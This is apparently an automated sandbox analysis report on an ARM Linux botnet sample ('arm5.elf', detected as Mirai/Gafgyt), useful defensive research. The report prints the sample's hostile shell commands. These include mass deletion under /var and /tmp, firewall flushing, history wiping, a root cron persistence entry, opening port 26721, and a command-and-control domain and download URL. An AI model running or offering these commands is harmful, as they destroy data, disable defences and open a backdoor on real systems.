              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/2307/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/11/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/11/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/918/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/918/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/6241/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/6241/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/12/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/12/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/13/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/13/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/14/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/14/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/15/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/15/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/16/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/16/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/17/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/17/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/18/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/18/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1594/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1594/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/120/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/120/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/121/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/121/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1349/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1349/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/1/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/122/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/122/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/243/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/243/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/123/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/123/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/2/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/2/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/124/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/124/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/3/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/3/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/4/statusJump to behavior
              Source: /usr/bin/pkill (PID: 6254)File opened: /proc/4/cmdlineJump to behavior
              Source: /tmp/arm5.elf (PID: 6219)Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6227)Shell command executed: sh -c "rm -rf /tmp/*"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6234)Shell command executed: sh -c "iptables -F"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6243)Shell command executed: sh -c "pkill -9 busybox"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6252)Shell command executed: sh -c "pkill -9 perl"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6256)Shell command executed: sh -c "pkill -9 python"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6261)Shell command executed: sh -c "service iptables stop"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6270)Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6274)Shell command executed: sh -c "service firewall stop"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6286)Shell command executed: sh -c "history -c"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6288)Shell command executed: sh -c "rm -rf ~/.bash_history"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6291)Shell command executed: sh -c "history -w"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6302)Shell command executed: sh -c "chmod +x /dev/ocmount"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6332)Shell command executed: sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6380)Shell command executed: sh -c /dev/ocmountJump to behavior
              Source: /tmp/arm5.elf (PID: 6601)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6635)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6638)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6641)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6644)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6584)Shell command executed: sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6621)Shell command executed: sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6625)Shell command executed: sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6628)Shell command executed: sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /tmp/arm5.elf (PID: 6631)Shell command executed: sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"Jump to behavior
              Source: /bin/sh (PID: 6327)Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmountJump to behavior
              Source: /bin/sh (PID: 6239)Iptables executable: /usr/sbin/iptables -> iptables -FJump to behavior
              Source: /bin/sh (PID: 6272)Iptables executable: /sbin/iptables -> /sbin/iptables -FJump to behavior
              Source: /bin/sh (PID: 6273)Iptables executable: /sbin/iptables -> /sbin/iptables -XJump to behavior
              Source: /bin/sh (PID: 6623)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 6597)Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPTJump to behavior
              Source: /bin/sh (PID: 6248)Pkill executable: /usr/bin/pkill -> pkill -9 busyboxJump to behavior
              Source: /bin/sh (PID: 6254)Pkill executable: /usr/bin/pkill -> pkill -9 perlJump to behavior
              Source: /bin/sh (PID: 6258)Pkill executable: /usr/bin/pkill -> pkill -9 pythonJump to behavior
              Source: /bin/sh (PID: 6221)Rm executable: /usr/bin/rm -> rm -rf /tmp/arm5.elf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-OmYV2g /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-McPs7g /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf /var/log/wtmpJump to behavior
              Source: /bin/sh (PID: 6233)Rm executable: /usr/bin/rm -> rm -rf /tmp/*Jump to behavior
              Source: /bin/sh (PID: 6290)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_historyJump to behavior
              Source: /usr/sbin/service (PID: 6263)Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.serviceJump to behavior
              Source: /usr/sbin/service (PID: 6266)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 6268)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /usr/sbin/service (PID: 6276)Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.serviceJump to behavior
              Source: /usr/sbin/service (PID: 6279)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
              Source: /usr/sbin/service (PID: 6281)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
              Source: /usr/bin/chmod (PID: 6327)File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /bin/sh (PID: 6332)Crontab like entry written: /etc/cron.d/mount.shJump to dropped file
              Source: /tmp/arm5.elf (PID: 6299)Writes shell script file to disk with an unusual file extension: /dev/ocmountJump to dropped file
              Source: /usr/sbin/service (PID: 6269)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: /usr/sbin/service (PID: 6282)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
              Source: submitted sampleStderr: Failed to stop iptables.service: Unit iptables.service not loaded.Failed to stop firewall.service: Unit firewall.service not loaded.sh: 1: history: not foundsh: 1: history: not found: exit code = 0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: /usr/bin/rm (PID: 6221)File: /tmp/arm5.elfJump to behavior
              Source: /usr/bin/pkill (PID: 6248)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 6254)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 6258)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /tmp/arm5.elf (PID: 6217)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/busybox (PID: 6637)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/busybox (PID: 6646)Queries kernel information via 'uname': Jump to behavior
              Source: /bin/busybox (PID: 6624)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/busybox (PID: 6634)Queries kernel information via 'uname': Jump to behavior
              Source: arm5.elf, 6217.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmp, arm5.elf, 6598.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
              Source: arm5.elf, 6217.1.000055b924543000.000055b924699000.rw-.sdmp, arm5.elf, 6598.1.000055b924543000.000055b924699000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
              Source: arm5.elf, 6217.1.000055b924543000.000055b924699000.rw-.sdmp, arm5.elf, 6598.1.000055b924543000.000055b924699000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
              Source: arm5.elf, 6217.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmp, arm5.elf, 6598.1.00007ffd6a394000.00007ffd6a3b5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: arm5.elf, type: SAMPLE
              Source: Yara matchFile source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: arm5.elf, type: SAMPLE
              Source: Yara matchFile source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: arm5.elf, type: SAMPLE
              Source: Yara matchFile source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: arm5.elf, type: SAMPLE
              Source: Yara matchFile source: 6217.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6598.1.00007fc008017000.00007fc00803d000.r-x.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Command and Scripting Interpreter
              1
              Systemd Service
              1
              Systemd Service
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              Service Stop
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              2
              File and Directory Permissions Modification
              LSASS Memory1
              System Network Configuration Discovery
              Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Scripting
              Logon Script (Windows)1
              Hidden Files and Directories
              Security Account Manager1
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Disable or Modify System Firewall
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              File Deletion
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1526772 Sample: arm5.elf Startdate: 06/10/2024 Architecture: LINUX Score: 96 101 octopus1337.geek 156.238.224.214, 32768, 32770, 32772 XHOSTSERVERUS Seychelles 2->101 103 109.202.202.202, 80 INIT7CH Switzerland 2->103 105 3 other IPs or domains 2->105 109 Antivirus / Scanner detection for submitted sample 2->109 111 Multi AV Scanner detection for submitted file 2->111 113 Yara detected Gafgyt 2->113 115 Yara detected Mirai 2->115 11 arm5.elf 2->11         started        13 gnome-session-binary sh gsd-sharing 2->13         started        15 gnome-session-binary sh gsd-keyboard 2->15         started        17 19 other processes 2->17 signatures3 process4 process5 19 arm5.elf 11->19         started        21 arm5.elf sh 11->21         started        23 arm5.elf sh 11->23         started        25 10 other processes 11->25 process6 27 arm5.elf 19->27         started        31 arm5.elf 19->31         started        33 arm5.elf 19->33         started        43 3 other processes 19->43 35 sh service systemctl 21->35         started        37 sh rm 23->37         started        39 sh service systemctl 25->39         started        41 sh rm 25->41         started        45 7 other processes 25->45 file7 99 /dev/ocmount, Bourne-Again 27->99 dropped 121 Manipulation of devices in /dev 27->121 47 arm5.elf 27->47         started        49 arm5.elf sh 27->49         started        59 4 other processes 27->59 53 arm5.elf sh 31->53         started        61 4 other processes 31->61 123 Sample tries to kill multiple processes (SIGKILL) 33->123 125 Tries to stop the "iptables" service 35->125 55 service 35->55         started        63 3 other processes 35->63 127 Sample deletes itself 37->127 65 4 other processes 39->65 57 arm5.elf 43->57         started        signatures8 process9 file10 67 arm5.elf sh 47->67         started        69 arm5.elf sh 47->69         started        71 arm5.elf sh 47->71         started        76 2 other processes 47->76 97 /etc/cron.d/mount.sh, ASCII 49->97 dropped 107 Sample tries to persist itself using cron 49->107 73 sh iptables 53->73         started        78 2 other processes 55->78 80 3 other processes 59->80 82 4 other processes 61->82 84 2 other processes 65->84 signatures11 process12 signatures13 86 sh iptables 67->86         started        89 sh busybox 69->89         started        91 sh busybox 71->91         started        119 Executes the "iptables" command to insert, remove and/or manipulate rules 73->119 93 sh 76->93         started        95 sh 76->95         started        process14 signatures15 117 Executes the "iptables" command to insert, remove and/or manipulate rules 86->117

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              arm5.elf38%VirustotalBrowse
              arm5.elf55%ReversingLabsLinux.Backdoor.Gafgyt
              arm5.elf100%AviraEXP/ELF.Mirai.W
              SourceDetectionScannerLabelLink
              /dev/ocmount0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              octopus1337.geek
              156.238.224.214
              truefalse
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://Change_ip/octopus_re.sh;chmodarm5.elffalse
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  212.118.43.167
                  unknownRussian Federation
                  25308CITYLAN-ASRUfalse
                  156.238.224.214
                  octopus1337.geekSeychelles
                  394281XHOSTSERVERUSfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  156.238.224.214arm7.elfGet hashmaliciousMiraiBrowse
                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                    212.118.43.167arm7.elfGet hashmaliciousMiraiBrowse
                      0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                        lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                          uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                            DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                              9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                                ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                                  ULDAb4NYKK.elfGet hashmaliciousUnknownBrowse
                                    PAqN0mrUbb.elfGet hashmaliciousUnknownBrowse
                                      TsjmK7qSlf.elfGet hashmaliciousUnknownBrowse
                                        91.189.91.43tarm.elfGet hashmaliciousUnknownBrowse
                                          bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                            eWJnMvRVHR.elfGet hashmaliciousUnknownBrowse
                                              bweSL7MAT3.elfGet hashmaliciousUnknownBrowse
                                                z5fPsSjCph.elfGet hashmaliciousUnknownBrowse
                                                  YeOJhYQjui.elfGet hashmaliciousUnknownBrowse
                                                    RSEVs3nWwI.elfGet hashmaliciousUnknownBrowse
                                                      5.elfGet hashmaliciousUnknownBrowse
                                                        main_arm7.elfGet hashmaliciousMiraiBrowse
                                                          main_ppc.elfGet hashmaliciousMiraiBrowse
                                                            91.189.91.42tarm.elfGet hashmaliciousUnknownBrowse
                                                              bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                eWJnMvRVHR.elfGet hashmaliciousUnknownBrowse
                                                                  bweSL7MAT3.elfGet hashmaliciousUnknownBrowse
                                                                    z5fPsSjCph.elfGet hashmaliciousUnknownBrowse
                                                                      YeOJhYQjui.elfGet hashmaliciousUnknownBrowse
                                                                        RSEVs3nWwI.elfGet hashmaliciousUnknownBrowse
                                                                          5.elfGet hashmaliciousUnknownBrowse
                                                                            main_arm7.elfGet hashmaliciousMiraiBrowse
                                                                              main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                octopus1337.geekarm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.238.224.214
                                                                                oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                • 149.88.81.199
                                                                                oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                                                                • 149.88.81.199
                                                                                oc_mips.elfGet hashmaliciousUnknownBrowse
                                                                                • 149.88.81.199
                                                                                oc_i686.elfGet hashmaliciousMiraiBrowse
                                                                                • 149.88.81.199
                                                                                oc_arm7.elfGet hashmaliciousUnknownBrowse
                                                                                • 149.88.81.199
                                                                                oc_arm.elfGet hashmaliciousUnknownBrowse
                                                                                • 149.88.81.199
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CANONICAL-ASGBarm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 185.125.190.26
                                                                                tarm.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                • 91.189.91.42
                                                                                eWJnMvRVHR.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                bweSL7MAT3.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                z5fPsSjCph.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                YeOJhYQjui.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                RSEVs3nWwI.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                5.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                main_arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.189.91.42
                                                                                INIT7CHtarm.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                • 109.202.202.202
                                                                                eWJnMvRVHR.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                bweSL7MAT3.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                z5fPsSjCph.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                YeOJhYQjui.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                RSEVs3nWwI.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                5.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                main_arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                main_ppc.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                CITYLAN-ASRUarm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 212.118.43.167
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 88.210.6.42
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                • 88.210.6.42
                                                                                0tGEmgFUHk.elfGet hashmaliciousUnknownBrowse
                                                                                • 212.118.43.167
                                                                                lhZOo8vhuI.elfGet hashmaliciousUnknownBrowse
                                                                                • 212.118.43.167
                                                                                uV4x1JLrrF.elfGet hashmaliciousUnknownBrowse
                                                                                • 212.118.43.167
                                                                                DQVl3rjqoZ.elfGet hashmaliciousGafgytBrowse
                                                                                • 212.118.43.167
                                                                                9jjtFFX0Tb.elfGet hashmaliciousUnknownBrowse
                                                                                • 212.118.43.167
                                                                                ceKWlceqnf.elfGet hashmaliciousUnknownBrowse
                                                                                • 212.118.43.167
                                                                                h2LK6AsZ1I.exeGet hashmaliciousRisePro StealerBrowse
                                                                                • 88.210.9.117
                                                                                XHOSTSERVERUSarm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.238.224.214
                                                                                https://tiktokmal1vip.com/Get hashmaliciousUnknownBrowse
                                                                                • 156.238.242.50
                                                                                https://tkglobalmall.vip/Get hashmaliciousUnknownBrowse
                                                                                • 156.238.242.50
                                                                                https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                                                                                • 156.238.197.18
                                                                                M46uio5ezW.exeGet hashmaliciousXWormBrowse
                                                                                • 156.238.224.69
                                                                                154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 156.254.22.232
                                                                                154.216.17.9-skid.mpsl-2024-08-04T06_22_50.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 156.238.223.101
                                                                                https://www.pnxubwf.cn/Get hashmaliciousUnknownBrowse
                                                                                • 156.231.11.124
                                                                                205.185.120.123-skid.arm5-2024-07-27T10_33_41.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 156.238.223.161
                                                                                205.185.120.123-skid.sh4-2024-07-27T10_33_38.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 156.238.223.130
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                /dev/ocmountarm7.elfGet hashmaliciousMiraiBrowse
                                                                                  oc_i486.elfGet hashmaliciousMiraiBrowse
                                                                                    oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                      oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                                                                        oc_mips.elfGet hashmaliciousUnknownBrowse
                                                                                          oc_i686.elfGet hashmaliciousMiraiBrowse
                                                                                            oc_arm7.elfGet hashmaliciousUnknownBrowse
                                                                                              oc_mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                oc_arm.elfGet hashmaliciousUnknownBrowse
                                                                                                  Process:/tmp/arm5.elf
                                                                                                  File Type:Bourne-Again shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):479
                                                                                                  Entropy (8bit):4.026921351476117
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:9rd/9GjuZZXegND07aW02vFgWccOHmAyCHOC1A9KiyhlrxleXUEMJJPJHeIHyHi5:rFGjuZog2+WvFgxq6DhllleXRW8ISCuU
